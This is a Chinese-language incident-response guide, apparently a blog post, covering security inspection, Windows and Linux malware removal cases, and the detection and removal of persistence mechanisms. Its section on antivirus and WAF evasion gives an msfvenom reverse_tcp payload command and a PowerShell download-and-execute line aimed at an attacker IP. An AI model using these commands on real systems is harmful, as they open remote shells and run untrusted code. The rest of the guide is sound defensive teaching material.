网络安全实战指南:从安全巡检到权限维持的应急响应与木马查杀全(命令查收表)
目录
一、安全巡检的具体内容
1. 巡检的频率与目标是什么
2. 巡检的内容是什么以及巡检后如何加固
二、Windows环境下应急响应的主要流程
1. 流程概述及每个步骤详细解释
步骤1:隔离与遏制
步骤2:识别与分析
步骤3:清除与恢复
步骤4:日志分析
步骤5:加固与预防
2. 结合案例
三、Linux环境下应急响应的主要流程
1. 流程概述及每个步骤详细解释
步骤1:隔离与遏制
步骤2:识别与分析
步骤3:清除与恢复
步骤4:日志分析
步骤5:加固与预防
2. 结合案例
四、查杀木马的具体流程(Windows与Linux案例)
1. Windows案例:勒索木马查杀
2. Linux案例:挖矿木马查杀
五、服务器被入侵后的应急响应
1. Windows案例:Web服务器被植入后门
2. Linux案例:数据库服务器被入侵
六、权限维持的常见方式、检测与防护
1. 常见权限维持方式
Windows
Linux
2. 检测权限维持手法
Windows
Linux
3. 解决权限维持手法
Windows
Linux
4. 防护后门与权限维持
Windows
Linux
5. 绕过杀毒软件与IWAF
七、综合输出与查漏补缺
1. 综合技术手法
2. 查漏补缺
一、安全巡检的具体内容
1. 巡检的频率与目标是什么
-
频率:安全巡检通常根据系统的重要性和威胁环境确定频率。一般建议每周一次常规巡检,对于高风险系统(如对外暴露的服务器)可增加至每日一次,而低风险系统可调整为每月一次。
-
目标:发现系统中的潜在威胁,包括系统漏洞、异常行为(如未授权访问)、恶意软件以及配置错误,防止攻击者利用这些弱点入侵系统。
2. 巡检的内容是什么以及巡检后如何加固
-
巡检内容:
-
系统漏洞扫描:检查操作系统、应用程序是否存在已知漏洞。
-
日志分析:审查系统日志(如Windows Event Viewer、Linux /var/log),寻找异常登录或操作。
-
文件完整性检查:验证关键系统文件是否被篡改。
-
用户权限审计:检查是否存在异常账户或权限提升。
-
杀毒软件更新:确保杀毒软件签名库和版本是最新的。
-
-
加固措施:
-
修补漏洞:使用补丁管理工具(如Windows Update、yum/apt)修复漏洞。
-
强化用户权限:删除不必要的管理员账户,使用最小权限原则。
-
更新杀毒软件:确保实时防护开启,定期全盘扫描。
-
加密敏感数据:对关键文件和通信启用加密(如TLS、BitLocker)。
-
二、Windows环境下应急响应的主要流程
1. 流程概述及每个步骤详细解释
Windows应急响应通常包括以下五个步骤:
-
隔离与遏制:阻止恶意软件扩散。
-
识别与分析:确定攻击来源和恶意行为。
-
清除与恢复:移除恶意软件并修复系统。
-
日志分析:追踪攻击路径和影响。
-
加固与预防:防止再次入侵。
步骤1:隔离与遏制
-
目的:防止恶意软件通过网络传播或进一步破坏。
-
工具与命令:
-
断开网络:物理拔网线或运行
netsh interface set interface "Ethernet" disable
。 -
启用防火墙:
netsh advfirewall set allprofiles state on
。
-
-
详细步骤:
-
发现异常后立即断开受感染设备的网络连接,但保留电源以便后续分析。
-
如果无法物理断网,使用防火墙规则阻止外部通信。
-
步骤2:识别与分析
-
目的:定位恶意进程、文件和网络活动。
-
工具与命令:
-
Process Explorer:查看进程详细信息。
-
Autoruns:检查启动项。
-
netstat -ano:列出网络连接和关联进程ID。
-
-
详细步骤:
-
运行
Process Explorer
,观察CPU/内存占用异常的进程,右键检查文件路径和数字签名。 -
使用
Autoruns
,查看注册表和计划任务中的可疑启动项。 -
执行
netstat -ano | findstr ESTABLISHED
,记录异常外部IP。
-
步骤3:清除与恢复
-
目的:删除恶意软件并修复系统。
-
工具与命令:
-
Malwarebytes:扫描并移除恶意软件。
-
sfc /scannow:修复系统文件。
-
-
详细步骤:
-
以安全模式启动系统(F8或msconfig)。
-
运行
Malwarebytes
,执行全盘扫描并隔离威胁。 -
执行
sfc /scannow
,修复被篡改的系统文件。
-
步骤4:日志分析
-
目的:了解攻击时间线和手法。
-
工具与命令:
-
Event Viewer:查看系统、安全日志。
-
wevtutil:导出日志,
wevtutil qe Security /f:text > security.log
。
-
-
详细步骤:
-
打开
Event Viewer
,筛选安全日志(如事件ID 4624/4625)。 -
导出日志进行详细分析,查找异常登录或进程启动。
-
步骤5:加固与预防
-
目的:防止类似事件再次发生。
-
工具与命令:
-
Windows Update:安装补丁。
-
net user:重置密码,
net user Administrator 新密码
。
-
-
详细步骤:
-
运行
Windows Update
更新系统。 -
检查并删除异常账户,强化密码策略。
-
2. 结合案例
-
案例:某企业Windows服务器被勒索病毒感染。
-
隔离:管理员发现异常后立即拔掉网线。
-
识别:使用
Process Explorer
发现进程svchost.exe
异常占用CPU,路径为C:\Temp
。 -
清除:运行
Malwarebytes
,隔离病毒并删除。 -
日志分析:在
Event Viewer
中发现攻击者通过RDP(事件ID 4624)登录。 -
加固:关闭RDP(
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f
),更新补丁。
-
三、Linux环境下应急响应的主要流程
1. 流程概述及每个步骤详细解释
Linux应急响应流程与Windows类似,但工具和命令不同:
-
隔离与遏制:阻止恶意软件扩散。
-
识别与分析:定位异常进程和网络活动。
-
清除与恢复:移除恶意软件并修复。
-
日志分析:追踪攻击路径。
-
加固与预防:提升安全性。
步骤1:隔离与遏制
-
目的:限制恶意软件影响范围。
-
工具与命令:
-
ifconfig down:禁用网络接口,
ifconfig eth0 down
。 -
iptables:阻断外部流量,
iptables -A INPUT -s 恶意IP -j DROP
。
-
-
详细步骤:
-
执行
ifconfig eth0 down
或拔网线。 -
使用
iptables
设置规则,阻止可疑IP。
-
步骤2:识别与分析
-
目的:找到恶意进程和连接。
-
工具与命令:
-
top:查看高占用进程。
-
ps aux:列出所有进程。
-
netstat -tuln:检查网络连接。
-
-
详细步骤:
-
运行
top
,记录异常进程PID。 -
执行
ps aux | grep PID
,查看进程详细信息。 -
使用
netstat -tuln | grep ESTABLISHED
,记录可疑连接。
-
步骤3:清除与恢复
-
目的:删除恶意软件。
-
工具与命令:
-
ClamAV:扫描病毒,
clamscan -r /
。 -
kill:终止进程,
kill -9 PID
。
-
-
详细步骤:
-
使用
kill -9 PID
终止可疑进程。 -
运行
clamscan -r / --remove
,删除恶意文件。
-
步骤4:日志分析
-
目的:确定攻击来源。
-
工具与命令:
-
cat /var/log/auth.log:查看登录记录。
-
journalctl:分析系统日志。
-
-
详细步骤:
-
执行
cat /var/log/auth.log | grep "Failed"
,查找暴力破解痕迹。 -
使用
journalctl -u sshd
,检查SSH登录事件。
-
步骤5:加固与预防
-
目的:防止再次入侵。
-
工具与命令:
-
yum/apt update:更新系统。
-
passwd:更改密码。
-
-
详细步骤:
-
执行
yum update -y
或apt upgrade
。 -
使用
passwd root
重置密码,启用iptables
防护。
-
2. 结合案例
-
案例:Linux服务器被植入挖矿木马。
-
隔离:执行
ifconfig eth0 down
。 -
识别:运行
top
,发现进程kswapd0
CPU占用100%,用ps aux
确认路径/tmp/xmrig
。 -
清除:执行
kill -9 PID
和rm -f /tmp/xmrig
。 -
日志分析:
cat /var/log/auth.log
显示SSH暴力破解成功。 -
加固:安装
fail2ban
,禁用root登录(PermitRootLogin no
在/etc/ssh/sshd_config
)。
-
四、查杀木马的具体流程(Windows与Linux案例)
1. Windows案例:勒索木马查杀
-
背景:2023年某企业PC感染勒索木马,文件被加密。
-
步骤:
-
隔离网络:
-
工具:命令行。
-
命令:
netsh interface set interface "Ethernet" disable
。 -
操作:以管理员权限运行CMD,输入命令禁用网络。
-
-
识别木马:
-
工具:
Process Explorer
、Autoruns
。 -
操作:运行
Process Explorer
,发现ransom.exe
在C:\Users\Temp
,用Autoruns
找到注册表启动项HKLM\Software\Microsoft\Windows\CurrentVersion\Run
。
-
-
分析网络活动:
-
工具:
Wireshark
。 -
操作:启动
Wireshark
,设置过滤器ip.addr == 可疑IP
,记录C2服务器地址。
-
-
清除木马:
-
工具:
Malwarebytes
。 -
操作:以安全模式运行
Malwarebytes
,扫描并删除ransom.exe
。
-
-
恢复与加固:
-
命令:
sfc /scannow
。 -
操作:修复系统文件,删除启动项(
reg delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v ransom
)。
-
-
2. Linux案例:挖矿木马查杀
-
背景:2023年某云服务器感染挖矿木马。
-
步骤:
-
隔离网络:
-
命令:
ifconfig eth0 down
。 -
操作:以root权限执行,断开网络。
-
-
识别木马:
-
工具:
top
、lsof
。 -
命令:
top
查看PID,lsof -p PID
确认文件/usr/local/bin/miner
。
-
-
检查网络:
-
命令:
netstat -tuln | grep ESTABLISHED
。 -
操作:发现连接至外部挖矿池IP。
-
-
清除木马:
-
工具:
ClamAV
。 -
命令:
clamscan -r / --remove
删除/usr/local/bin/miner
。
-
-
加固系统:
-
工具:
fail2ban
。 -
操作:安装
fail2ban
,配置/etc/fail2ban/jail.local
阻止SSH暴力破解。
-
-
五、服务器被入侵后的应急响应
1. Windows案例:Web服务器被植入后门
-
背景:2023年某Windows IIS服务器被上传WebShell。
-
步骤:
-
隔离:
netsh advfirewall set allprofiles state on
。 -
检查网络:
-
命令:
netstat -ano | findstr LISTEN
。 -
操作:发现异常端口8080。
-
-
列出进程:
-
命令:
tasklist /svc
。 -
操作:找到关联进程
w3wp.exe
,用Process Explorer
确认路径C:\inetpub\wwwroot\shell.aspx
。
-
-
检查计划任务:
-
命令:
schtasks /query
。 -
操作:发现后门任务
BackdoorTask
。
-
-
检查注册表:
-
命令:
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
。 -
操作:找到可疑键值。
-
-
清除与恢复:
-
操作:删除
shell.aspx
,运行Malwarebytes
,删除任务(schtasks /delete /tn BackdoorTask /f
)。
-
-
加固:关闭不必要端口,更新IIS补丁。
-
2. Linux案例:数据库服务器被入侵
-
背景:2023年某Linux MySQL服务器被植入恶意脚本。
-
步骤:
-
隔离:
iptables -A INPUT -j DROP
。 -
检查网络:
-
命令:
ss -tuln
。 -
操作:发现异常端口9999。
-
-
列出进程:
-
命令:
ps aux | grep 9999
。 -
操作:找到进程
/tmp/backdoor.sh
。
-
-
检查计划任务:
-
命令:
crontab -l
。 -
操作:发现每分钟执行
/tmp/backdoor.sh
。
-
-
搜索可疑文件:
-
命令:
find / -name "*.sh" -mtime -7
。 -
操作:定位所有最近修改的脚本。
-
-
清除与恢复:
-
操作:删除
/tmp/backdoor.sh
,运行ClamAV
。
-
-
加固:禁用root SSH,安装
SELinux
。
-
六、权限维持的常见方式、检测与防护
1. 常见权限维持方式
Windows
-
注册表启动项:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
。 -
计划任务:通过
schtasks
创建。 -
DLL劫持:替换系统DLL。
-
服务:注册恶意服务(
sc create
)。
Linux
-
crontab计划任务:定时执行恶意脚本。
-
SSH密钥:添加至
~/.ssh/authorized_keys
。 -
SUID/SGID程序:设置权限提升文件。
-
隐藏文件:如
.malware
。
2. 检测权限维持手法
Windows
-
检测项:启动项、计划任务、服务、异常进程。
-
工具与命令:
-
Autoruns
:检查所有启动项。 -
Sysmon
:监控系统行为(需配置规则)。
-
Linux
-
检测项:crontab、SSH密钥、SUID文件、隐藏文件。
-
工具与命令:
-
auditd
:审计系统调用。 -
find / -perm -4000
:查找SUID文件。
-
3. 解决权限维持手法
Windows
-
命令:
-
删除启动项:
reg delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v 键名 /f
。 -
删除任务:
schtasks /delete /tn 任务名 /f
。
-
Linux
-
命令:
-
删除crontab:
crontab -r
。 -
删除SSH密钥:
rm ~/.ssh/authorized_keys
。
-
4. 防护后门与权限维持
Windows
-
工具:
AppLocker
(限制程序执行)、组策略。
Linux
-
工具:
SELinux
(强制访问控制)、AppArmor
。
5. 绕过杀毒软件与IWAF
-
方式:
-
免杀技术:使用Packer(如UPX)或自定义加密。
-
内存注入:将代码注入合法进程(如
powershell.exe
)。 -
混淆代码:使用Base64编码或多态技术。
-
-
详细步骤:
-
编写恶意代码(如PowerShell脚本)。
-
使用
msfvenom
生成免杀payload:msfvenom -p windows/meterpreter/reverse_tcp LHOST=攻击者IP LPORT=4444 -f exe -o payload.exe
。 -
注入进程:
powershell -ep bypass -c IEX(New-Object Net.WebClient).DownloadString('http://攻击者IP/payload.ps1')
。
-
七、综合输出与查漏补缺
1. 综合技术手法
-
安全巡检:漏洞扫描、日志分析、权限审计。
-
应急响应:Windows(Sysinternals、Malwarebytes)、Linux(top、ClamAV)。
-
木马查杀:行为分析、最新工具。
-
权限维持:检测(Autoruns、auditd)、防护(AppLocker、SELinux)。
2. 查漏补缺
-
最新技术:EDR/XDR、SIEM、容器安全。
-
失效技术:传统杀毒软件、手动巡检。
相关文章:
网络安全实战指南:从安全巡检到权限维持的应急响应与木马查杀全(命令查收表)
目录 一、安全巡检的具体内容 1. 巡检的频率与目标是什么 2. 巡检的内容是什么以及巡检后如何加固 二、Windows环境下应急响应的主要流程 1. 流程概述及每个步骤详细解释 步骤1:隔离与遏制 步骤2:识别与分析 步骤3:清除与恢复 步骤4…...
Infrared Finance:Berachain 生态的流动性支柱
在加密市场中,用户除了参与一级和二级交易,还有一种低门槛参与的就是空投。从 2021 年 DeFi 成为主流开始,空投一直都是“以小搏大”的机会,通过参与项目早期的链上交互和任务以获取空投奖励,近几年已成为一种广受欢迎…...
Hadoop和Spark大数据挖掘与实战
1.概述 本节将系统讲解大数据分析的完整流程,包括数据采集、预处理、存储管理、分析挖掘与结果可视化等核心环节。与此同时,我们还将对主流数据分析工具进行横向对比,帮助读者根据实际需求选用最合适的工具,提升数据价值挖掘的效…...
TCP vs UDP:核心区别、握手过程与应用场景(附对比图)
🌐 引言 在网络通信中,TCP(传输控制协议)和UDP(用户数据报协议)是两大核心传输层协议。它们各有优劣,适用于不同场景。本文将用图文对比实战示例,帮你彻底理解两者的区别࿰…...
人工智能-深度学习之多层感知器
深度学习 任务任务1任务2任务3 机器学习的弊端多层感知器 (MLP/人工神经网络)MLP实现非线性分类Keras介绍与实战准备Keras or TensorflowKeras建立MLP模型 实战(1): 建立MLP实现非线性二分类实战(2): MLP实…...
Improving Deep Learning For Airbnb Search
解决问题 问题1: 解决推荐酒店与用户实际预定酒店价格存在偏差问题,实际预定比推荐要更便宜: 所以问题为是否更低价格的list更倾向于用户偏好,应该被优先推荐? 1. 该文通过数据分析与模型演进,将模型改造为item sco…...
多模态大型模型,实现以人为中心的精细视频理解
大家看完觉得有帮助记得点赞和关注!!! 抽象 精细理解视频中人类的动作和姿势对于以人为中心的 AI 应用程序至关重要。在这项工作中,我们介绍了 ActionArt,这是一个细粒度的视频字幕数据集,旨在推进以人为中…...
向量数据库Milvus的部署与使用
Milvus介绍 Milvus是一个开源、高性能、高扩展性的向量数据库,Milvus可以用来存储文本、图像、音频等非结构化数据,本质上是用Embeddings将非结构化数据转换成能够捕捉其基本特征的数字向量,然后将这些向量存储在向量数据库中,从…...
1.文档搜索软件Everything 的使用介绍
Everything 是 Windows 文件搜索的效率天花板,通过灵活语法和极速响应,彻底告别「找文件焦虑」。 定位:一款专注于 极速文件名搜索 的 Windows 工具,免费且轻量(安装包仅几 MB)。 核心优势…...
2025系统架构师---论企业集成平台的技术与应用
摘要 本文探讨了企业集成平台的技术与应用,以某商业银行开发的绩效考核平台系统为例,分析了企业集成平台的基本功能及关键技术,并详细阐述了在表示集成、数据集成、控制集成和业务流程集成方面的应用和实施方式。通过异构系统之间的集成,绩效考核平台与其他系统实现了有机…...
STM32Cubemx-H7-16-FreeRTOS-1-创建工程,实现两个灯的基本亮灭
前言 裸机也是开发到一半快要结束了,接下来开始上操作系统,然后先能使用基本的,后面再讲理论。 Cubemx创建工程 基本打开生成就不说了,直接从界面开始 从这里开始吧 1.首先开启外部高速晶振 2.先这样选择 选择HSE时钟环ÿ…...
深入浅出限流算法(二):更平滑的滑动窗口
好的,接续上一篇关于固定窗口计数器的讨论,我们现在来看看它的改进版——滑动窗口算法,它旨在解决固定窗口那个恼人的“临界突变”问题。 在上一篇文章中,我们探讨了最简单的固定窗口计数器限流算法,并指出了它最大的缺…...
纷析云开源财务软件:基于Spring Boot的轻量化财务中台实践
一、技术架构与核心设计 全栈开源技术栈 后端框架:基于Spring Boot 3.x构建,集成MyBatis-Plus作为ORM层,支持JDK 17特性(如虚拟线程并发处理),确保高吞吐与稳定性。 前端框架:采用Vue 3 TypeS…...
软考-软件设计师中级备考 5、数据结构 树和二叉树
1、树的基本概念 节点的度:节点拥有的子树数目。例如,若一个节点有 3 棵子树,其度为 3。树的度:树中节点的最大度数。如树中所有节点的度最大为 4,则树的度是 4。叶子节点:度为 0 的节点,也…...
php 需要学会哪些技术栈,掌握哪些框架
作为一个「野生」程序员,我的学习过程比较急功近利。 我记得自己写的第一个 PHP 程序是留言本。一上来对 PHP 一窍不通,所以直接去网上找了个留言本的源码,下载下来后先想办法让它在自己电脑上运行起来。通过这个过程掌握了 PHP 开发环境的搭…...
短视频矩阵系统贴牌批量剪辑功能开发,支持OEM
一、引言 在短视频行业蓬勃发展的当下,短视频矩阵运营已成为企业和个人实现品牌推广、流量增长的重要策略。然而,面对大量的视频素材和多个运营账号,传统的单个视频剪辑、发布方式效率极低,难以满足矩阵运营的需求。为了提高内容…...
【Java EE初阶】多线程(二)
1.在图中代码,我们调用了start方法,真正让系统调用api创建了一个新线程,而在这个线程跑起来之后,就会自动执行到run。调用start方法动作本身速度非常快,一旦执行,代码就会立即往下走,不会产生任…...
分布式链路追踪理论
基本概念 分布式调用链标准-openTracing Span-节点组成跟踪树结构 有一些特定的变量,SpanName SpanId traceId spanParentId Trace(追踪):代表一个完整的请求流程(如用户下单),由多个Span组成…...
conda和bash主环境的清理
好的!要管理和清理 Conda(或 Bash)安装的包,可以按照以下步骤进行,避免冗余依赖,节省磁盘空间。 📌 1. 查看已安装的包 先列出当前环境的所有安装包,找出哪些可能需要清理ÿ…...
Linux系统管理与编程14:Shell变量及定制bash登录界面
兰生幽谷,不为莫服而不芳; 君子行义,不为莫知而止休。 1.准备工作 创建用户wu useradd wu passwd wu 修改权限 chmod uw /etc/sudoers 编辑 visudo 在root行下,添加:“wu ALL……” 图14- 1 恢复文件权限并…...
微信小程序开发笔记
一、首先,下载一个微信开发者工具。前端项目就正常创建,由于本人的前端一塌糊涂,就让AI给我生成了一个我想要的前端项目(包括后面写功能)。 这里开发的时候会用到这个,但是一定注意服务部署到服务器上再本…...
SEO长尾关键词优化核心策略
内容概要 在搜索引擎优化领域,长尾关键词因其精准的流量捕获能力与较低的竞争强度,已成为提升网站自然流量的核心突破口。本文围绕长尾关键词优化的全链路逻辑,系统拆解从需求洞察到落地执行的五大策略模块,涵盖用户搜索意图解析…...
第一节:Linux系统简介
理论知识 Linux的起源与发展:1991 年,芬兰赫尔辛基大学的学生林纳斯托瓦兹受到 Minix 和 Unix 思想的启发,开始编写 Linux 内核。最初,它只是一个个人项目,但随着开源社区的加入,Linux 迅速发展壮大。如今…...
微信聊天机器人搭建 教程/开发
创建标签 简要描述: 添加标签 请求URL: http://域名地址/addContactLabel 请求方式: POST 请求头Headers: Content-Type:application/jsonAuthorization:login接口返回 参数: 参数名必…...
Ubuntu中C++项目安装二次规划库——qpOASES 库
一、在Ubuntu安装qpOASES 库 步骤 1:更新系统包列表 首先,打开终端,执行以下命令更新系统的包列表,以确保你能获取到最新的软件包信息。 sudo apt update 步骤 2:安装必要的依赖 qpOASES库的编译和安装需要一些基…...
JavaScript-基础语法
前言: 一个网页由三个部分组成: 1.html:超文本标记语言,用于控制网页的结构(页面元素和内容) 2.css:级联样式表,用于控制网页布局,涉及对网页文字,背景,布局进…...
已有 npm 项目,如何下载依赖、编译并运行项目
诸神缄默不语-个人技术博文与视频目录 这篇博文的适用场景是比如说反正你现在有了一个现成的npm项目,然后无论如何,你要把前端挂起来。 文章目录 一、准备工作1. 安装 Node.js 和 npm2. 克隆或获取项目代码 二、安装项目依赖三、了解 npm 脚本命令四、构…...
第四章:Messaging and Memory
Chapter 4: Messaging and Memory 从配置管理到消息记忆:如何让AI记住对话内容? 在上一章的配置管理中,我们已经能让系统记住所有参数设置。但你是否想过:如果用户连续提问“今天天气如何?”和“明天呢?”…...
iPhone闹钟无法识别调休致用户迟到,苹果客服称会记录反馈
iPhone闹钟无法识别调休致用户迟到,苹果客服称会记录反馈 基于 6 个来源 因“五一”劳动节调休,4月27日(周日)本应上班,不少iPhone用户却因闹钟未响迟到,“调休”“当苹果闹钟遇到调休”话题登上热搜。苹…...
npm error code CERT_HAS_EXPIRED
npm error code CERT_HAS_EXPIRED 欢迎来到我的主页,我是博主英杰,211科班出身,就职于医疗科技公司,热衷分享知识,武汉城市开发者社区主理人 擅长.net、C、python开发, 如果遇到技术问题,即可私…...
C++ 之 【list的简介、list 的构造函数、iterator、容量操作、元素访问、增删查改与迭代器失效】
目录 1.list的介绍 2.list的使用 2.1 构造函数 2.2 iterator 的使用 2.3 容量操作 2.4 元素访问 2.5 增删查改 2.5.1头插头删与尾插尾删 2.5.2 insert 、erase 函数 2.5.3 clear、swap函数 2.5.4 关于find函数 3.迭代器失效 1.list的介绍 (1)list的底层通常实现为带…...
使用手机录制rosbag包
文章目录 简介录制工具录制步骤录制设置设置IMU录制频率设置相机分辨率拍照模式录制模式数据制作获取数据数据转为rosbag查看rosbag简介 ROS数据包(rosbag)是ROS系统中用于记录和回放传感器数据的重要工具,通常用于算法调试、系统测试和数据采集。传统上,rosbag依赖于ROS环…...
使用阿里云 CDN 保护网站真实 IP:完整配置指南
使用阿里云 CDN 保护网站真实 IP:完整配置指南 一、宝塔面板准备工作1. 确认网站部署状态2. 宝塔中检查网站配置 二、配置阿里云 CDN1. 添加域名到 CDN2. 配置 DNS 解析3. 配置成功确认 三、宝塔面板安全加固(隐藏 IP 的关键步骤)1. 禁止通过…...
JAVA-StringBuilder使用方法
JAVA-StringBuilder使用方法 常用方法 append(Object obj) 追加内容到末尾 sb.append(" World"); insert(int offset, Object obj) 在指定位置插入内容 sb.insert(5, “Java”); delete(int start, int end) 删除指定范围的字符 sb.delete(0, 5); replace(int start…...
Milvus(9):字符串字段、数字字段
1 字符串字段 在 Milvus 中,VARCHAR 是用于存储字符串数据的数据类型。定义VARCHAR 字段时,有两个参数是必须的: 将datatype 设置为DataType.VARCHAR 。指定max_length ,它定义了VARCHAR 字段可存储的最大字符数。max_length 的有…...
locust压力测试
安装 pip install locust验证是否安装成功 locust -V使用 网上的教程基本上是前几年的,locust已经更新了好几个版本,有点过时了,在此做一个总结 启动 默认是使用浏览器进行设置的 # 使用浏览器 locust -f .\main.py其他参数 Usage: locust […...
Uniapp:showLoading(等待加载)
目录 一、出现场景二、效果展示三、具体使用一、出现场景 在项目的开发中,我们经常会请求后台接口返回数据,但是每一个接口返回数据的时间不一致,有的快,有的慢,这个时候如果不加一个遮罩层,接口返回慢的时候,非常影响用户体验 二、效果展示 三、具体使用 显示加载框…...
线性代数的本质大白话理解
先一句话总结的如下: 线性代数的本质,就是研究“线性变化”——包括空间中点、向量、矩阵之间如何通过线性规则(加法、数乘)变化和联系,并理解这些变化背后的结构。 1. 向量(Vector)——不是数据…...
【Rust通用集合类型】Rust向量Vector、String、HashMap原理解析与应用实战
✨✨ 欢迎大家来到景天科技苑✨✨ 🎈🎈 养成好习惯,先赞后看哦~🎈🎈 🏆 作者简介:景天科技苑 🏆《头衔》:大厂架构师,华为云开发者社区专家博主,…...
Kotlin await等待多个异步任务都完成后才进行下一步操作
Kotlin await等待多个异步任务都完成后才进行下一步操作 import kotlinx.coroutines.*fun main() {runBlocking {val tagA "a"val tagB "b"val a async {worker(tagA)}val b async {worker(tagB)}println("${System.currentTimeMillis()} 等待 $t…...
佛山大旺高新区3650 M5 ERP服务器维修案例
1:机器型号:联想system x3650 m5 2:故障问题:纺织公司由于没有专业的it网管,导致服务器各种爆故障灯,本次处理的是用户反馈最近ERP软件使用过程中经常弹出资源不足的报错。 3:于是预约我们工程…...
利用Python生成Xilinx FPGA ROM IP核 .coe初始化文件
以下是一个 Python 脚本,用于生成 Xilinx IP ROM 的.coe 格式初始化文件,假设ROM 深度为 1024,数据位宽为 32bit,使用随机的 32 位无符号数进行初始化: import random# 定义ROM的深度和数据位宽 rom_depth 1024 data…...
配置电子邮件服务
配置电子邮件服务 一.基于Postfix的邮件发送 1. 安装Postfix yum install postfix -y 再下载一个telnet工具 yum -y install telnet 启动Postfix systemctl start postfix systemctl enable postfix 查看系统中端口是否被Postfix使用 netstat -tnlp | gre…...
WGCAT工单系统发现错误 定时处理工单数据任务错误
一直在用WGCAT工单系统,今天在系统日志里,看到了这个错误提示,不知道是什么原因 2025-04-26 07:05:00.000 [taskScheduler-10] INFO com.wgcloud.task.ScheduledTask - 定时处理工单数据任务开始----------2025-04-26 07:05:00 2025-04-26 …...
软件工程(一):黑盒测试与白盒测试
黑盒测试(Black Box Testing) 定义 黑盒测试是指不关心程序内部实现细节,只关注输入和输出的测试方法。把被测软件当作一个“黑盒子”,只依据功能说明书或需求文档来编写测试用例,验证功能是否正确。 特点 不需要了…...
emqx部署
要修改文件-命名空间-节点选择器 #apiVersion: v1 ##kind: ConfigMap ##metadata: ## name: emqx-config ##data: ## emqx.conf: | ## # --- apiVersion: v1 kind: PersistentVolume metadata:name: emqx-pv spec:capacity:storage: 5GivolumeMode: FilesystemaccessMode…...
【KWDB 创作者计划】_KWDB产品技术解读
文章目录 每日一句正能量一、KWDB简介二、官网信息三、技术亮点解读(一)存储引擎(二)查询引擎(三)分布式架构 四、应用场景五、总结 每日一句正能量 你的心为什么这样分散,使得你放慢了脚步。他…...
C++ 表达式求值优先级、结合律与求值顺序(五十九)
1. 运算符优先级与结合律 优先级(Precedence) 决定未加括号时运算符如何“绑”在一起:5 10 * 20 / 2; // 等同于 5 ((10 * 20) / 2)结合律(Associativity) 决定同级运算符的结合方向: 左结合࿰…...
乐理学习笔记(一)---节拍与音符
节拍 衡量音的长度和节奏的基本单位,以强弱关系按照一定的规律循环进行 拍大腿、拍手 类型 上面的这些不同类型节拍的强弱关系中第一个都是强(起确定性作用,而不是音量最大) 强和弱是决定性的区别,每一个强拍是和弦…...
《系统架构 - Java 企业应用架构中的完整层级划分》
文章目录 Java 企业应用架构中的完整层级划分核心层级(基础架构)业务逻辑层接口层基础设施层辅助层级特殊架构层级现代架构扩展层各层调用关系示例分层原则建议 Java 企业应用架构中的完整层级划分 除了常见的 Controller、Service、DAO 等标准层级外&a…...